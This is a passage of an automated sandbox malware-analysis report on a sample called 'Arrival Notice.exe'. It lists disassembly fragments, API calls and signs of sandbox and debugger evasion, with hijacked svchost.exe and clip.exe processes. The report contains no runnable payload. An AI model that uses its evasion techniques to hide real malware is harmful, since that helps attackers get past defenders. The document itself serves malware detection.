            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx 1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A85486 pushad ; iretd 2_2_04A85488
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A81C74 push es; ret 2_2_04A81C78
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A915D2 push ecx; iretd 2_2_04A915D3
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A9C6A6 push ecx; iretd 2_2_04A9C6A7
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A8B6D3 push esp; ret 2_2_04A8B6DB
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A9CE38 push ecx; retf 2_2_04A9CE39
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A91E11 push 2823B84Bh; retf 2_2_04A91E21
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A977BF push FFFFFFB8h; retf 2_2_04A977C1
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A9773E push edi; ret 2_2_04A9773F
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A98277 push edx; ret 2_2_04A98293
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Code function: 2_2_04A90BF0 push ebx; retf 2_2_04A90BF3
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050827FA pushad ; ret 3_2_050827F9
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0508225F pushad ; ret 3_2_050827F9
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003CF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00441C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Arrival Notice.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-95255
            Source: C:\Users\user\Desktop\Arrival Notice.exe API/Special instruction interceptor: Address: 3523234
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 4981
            Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 4990
            Source: C:\Users\user\Desktop\Arrival Notice.exe API coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284 Thread sleep count: 4981 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284 Thread sleep time: -9962000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284 Thread sleep count: 4990 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284 Thread sleep time: -9980000s >= -30000s
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796 Thread sleep time: -37500s >= -30000s
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_0041DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0041DBBE
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_004268EE FindFirstFileW,FindClose, 0_2_004268EE
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_0042698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0042698F
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_0041D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0041D076
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_0041D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0041D3A9
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_00429642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00429642
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_0042979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0042979D
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_00429B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00429B2B
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_00425C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00425C97
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_02F8BC20 FindFirstFileW,FindNextFileW,FindClose, 3_2_02F8BC20
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003B42DE
            Source: clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135692843.00000000012AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: firefox.exe, 00000008.00000002.2149792797.000001F80780C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004173E3 LdrLoadDll, 1_2_004173E3
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_0042EAA2 BlockInput, 0_2_0042EAA2
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_003E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003E2622
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003B42DE
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_003D4CE8 mov eax, dword ptr fs:[00000030h] 0_2_003D4CE8
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_03523500 mov eax, dword ptr fs:[00000030h] 0_2_03523500
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_035234A0 mov eax, dword ptr fs:[00000030h] 0_2_035234A0
            Source: C:\Users\user\Desktop\Arrival Notice.exe Code function: 0_2_03521E70 mov eax, dword ptr fs:[00000030h] 0_2_03521E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h] 1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h] 1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038663FF mov eax, dword ptr fs:[00000030h] 1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h] 1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h] 1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h] 1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h] 1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390634F mov eax, dword ptr fs:[00000030h] 1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D437C mov eax, dword ptr fs:[00000030h] 1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h] 1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382823B mov eax, dword ptr fs:[00000030h] 1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h] 1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h] 1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390625D mov eax, dword ptr fs:[00000030h] 1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h] 1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836259 mov eax, dword ptr fs:[00000030h] 1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382826B mov eax, dword ptr fs:[00000030h] 1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03870185 mov eax, dword ptr fs:[00000030h] 1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
